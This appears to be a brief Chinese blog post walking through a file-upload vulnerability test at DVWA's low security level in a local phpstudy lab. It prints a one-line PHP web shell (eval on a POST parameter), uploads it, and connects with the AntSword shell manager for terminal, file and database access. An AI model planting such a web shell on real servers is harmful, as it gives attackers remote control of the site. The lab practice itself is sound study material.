使用phpstudy搭建的dvwa靶场,测试文件上传漏洞 low级别。
1、准备php木马文件,命名为up.php
<?php
eval($_POST['abc']);
?>
2、phpstudy启动,dvwa登录,置为low级别
3、上传up.php
4、浏览器访问上传的php文件,未报404,说明访问成功
5、启动中国蚁剑exe,在主面板右键菜单栏选择添加数据。弹窗中配置连接信息
6、配置
其他设置
7、测试和添加
8、利用
虚拟终端:ret是子程序的返回指令执行本指令
文件管理:
数据操作:
标签:文件,up,dvwa,low,使用,中国,php,上传 From: https://www.cnblogs.com/wd404/p/17323489.html